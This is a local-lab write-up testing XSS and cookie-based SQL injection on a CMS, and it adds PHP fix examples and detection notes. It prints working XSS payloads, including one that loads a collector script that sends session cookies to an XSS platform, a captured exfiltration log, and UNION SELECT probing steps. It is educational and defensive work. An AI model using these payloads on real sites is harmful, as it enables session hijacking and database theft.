Build a vulnerable website locally to verify an XSS vulnerability and see how SQL injection is exploited.
Use the PHPStudy tool to set up a food-industry CMS website as the test platform.
0x01 XSS Test
Open the browser's debug mode (developer tools) and locate the input box for the name field:
Try inserting the following XSS payload into its value attribute:
123"><script>alert(document.cookie);</script></td><td>
Click Update; after logging in, the site pops up the cookie information. Note that this input box does not filter <script> tags.
If you want to send this cookie to your XSS platform, construct the following input instead:
"/></td><script src="http://127.0.0.1:9999/static/get.js"></script><td>
http://127.0.0.1:9999/static/get.js is the script on the local XSS platform that collects information such as the cookie.
The platform then shows the following information locally, including the cookie, user agent, IP address and more:
id:2j1h
Location:http://www.xdcms.com/index.php?m=member&f=edit
Toplocation:http://www.xdcms.com/index.php?m=member&f=edit
COOKIE:PHPSESSID=7urapqfnc9cchs31lfu38u0pi4; Member_user=xdcms; Member_userid=3
Opener
Http_user_agent Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Http_addr 127.0.0.1
[30/Oct/2017 16:04:36] "GET /?do=api&id=2j1h&location=http%3A//www.xdcms.com/index.php%3Fm%3Dmember%26f%3Dedit&toplocation=http%3A//www.xdcms.com/index.php%3Fm%3Dmember%26f%3Dedit&cookie=PHPSESSID%3D7urapqfnc9cchs31lfu38u0pi4%3B%20Member_user%3Dxdcms%3B%20Member_userid%3D3&opener= HTTP/1.1" 200 3
Checking the backend database shows that the code has been written to the database; I am not sure whether this counts as stored XSS. In summary, this sends the cookie information to the XSS platform every time the page is refreshed.
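The root cause of the XSS above is that the name value is echoed back into an HTML attribute without encoding, so a double quote closes the attribute and a script tag can follow. The fix is output encoding for the attribute context rather than trying to filter <script>. The following is an added example, not code from the write-up or from the CMS; the function names, the assumed value variable and the sample payload are constructed here, and the HttpOnly setting is shown as defence in depth for the cookie-theft step:

```php
<?php
// Added example (not XDCMS code). Assumed: $name holds whatever the user typed
// into the name input box and is rendered back into the edit form.

// VULNERABLE: the stored value goes straight into value="...", so
// 123"><script>...</script> closes the attribute and the tag.
function renderNameVulnerable(string $name): string {
    return '<td><input type="text" name="name" value="' . $name . '"></td>';
}

// FIXED: encode for the HTML attribute context. ENT_QUOTES also encodes the
// double quote, which is exactly the character the payload uses to break out.
function renderNameSafe(string $name): string {
    $encoded = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<td><input type="text" name="name" value="' . $encoded . '"></td>';
}

// Constructed sample: the payload used in the test above.
$payload = '123"><script>alert(document.cookie);</script></td><td>';
echo renderNameVulnerable($payload), PHP_EOL; // a live <script> element in the page
echo renderNameSafe($payload), PHP_EOL;       // literal text, still inside the attribute

// Self-check: the encoded output contains no raw tag or quote from the input.
assert(strpos(renderNameSafe($payload), '<script') === false);
assert(strpos(renderNameSafe($payload), '123&quot;&gt;') !== false);

// Defence in depth: an HttpOnly session cookie cannot be read via document.cookie,
// so a collector like get.js would not receive PHPSESSID even if a script did run.
// Must be set before session_start() (or via session.cookie_httponly = 1 in php.ini).
ini_set('session.cookie_httponly', '1');
// session_start();
```

Detection-wise, the log line shown above is the signature to look for on the server side: a GET to an unexpected host carrying a full cookie string and the referring URL as query parameters.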
0x02 SQL injection Test
Looking at the backend PHP code, the input interface contains a statement that interacts with MySQL:
The input parameter $userid is taken from the Member_userid parameter in the cookie, so the cookie injection method is used here.
Download a cookie-editing browser plugin and modify Member_userid.
With Member_userid=1, the name shown is test, so modifying this cookie value lets you read the database.
Use UNION SELECT to try to get more database information.
Testing with Member_userid=4, the name and phone fields are empty, indicating that the table has only 3 records.
Trying UNION SELECT ......, the following error occurred:
The error says the SELECT statements have a different number of columns, which shows that the UNION SELECT does not have the same number of columns as the table; trying different counts, 15 columns produces no error:
From this display it can be seen that the username, mobile phone number, name, security email and contact address are columns 3, 13, 12, 15 and 14 of the table. Database information can be extracted through these positions.
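The cookie injection works because the raw Member_userid value is concatenated into the SQL string, so the column-count errors and the UNION result both come straight from the database. Two things fix it: bind the value as a parameter after validating it as an integer, and stop treating a client-held cookie as the identity check. The following is an added example, not the CMS's own code; it uses an in-memory SQLite table through PDO (assumes the pdo_sqlite extension) with constructed rows and column names, and the session user id is assumed to be 3:

```php
<?php
// Added example (not XDCMS code). Constructed table so it runs without MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE member (userid INTEGER PRIMARY KEY, username TEXT, name TEXT, phone TEXT)');
$db->exec("INSERT INTO member VALUES (1,'u1','test','111'),(2,'u2','bob','222'),(3,'xdcms','alice','333')");

// VULNERABLE: the cookie value is concatenated into the query, so Member_userid
// controls the whole WHERE clause, including any UNION SELECT appended to it.
function lookupVulnerable(PDO $db, string $cookieUserid): array {
    $sql = "SELECT username, name, phone FROM member WHERE userid=$cookieUserid";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: (1) validate the cookie as a positive integer, (2) bind it as a parameter,
// (3) compare it with the server-side session instead of trusting the cookie alone.
function lookupSafe(PDO $db, string $cookieUserid, int $sessionUserid): ?array {
    if (filter_var($cookieUserid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]) === false) {
        return null;                       // non-integer (e.g. a UNION probe): rejected
    }
    $userid = (int) $cookieUserid;
    if ($userid !== $sessionUserid) {
        return null;                       // cookie changed to another user's id: rejected
    }
    $stmt = $db->prepare('SELECT username, name, phone FROM member WHERE userid = :id');
    $stmt->execute([':id' => $userid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: the user's own id, a tampered id, and a UNION probe.
$sessionUserid = 3;                        // assumed: logged-in session belongs to userid 3
$cases = ['3', '1', '1 UNION SELECT username, name, phone FROM member'];
foreach ($cases as $cookie) {
    $vuln = lookupVulnerable($db, $cookie);
    $safe = lookupSafe($db, $cookie, $sessionUserid);
    printf("cookie=%-50s vulnerable rows=%d  safe=%s\n",
        $cookie, count($vuln), $safe !== null ? $safe['name'] : 'rejected');
}
// Expected: '3' -> 1 row / alice; '1' -> 1 row / rejected; the UNION probe -> 3 rows / rejected.
```

With the prepared statement in place, a value such as "4" simply returns no row and a non-numeric value never reaches the database, so the error-message and column-count behaviour the test above relied on disappears.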
XSS and SQL injection Learning 1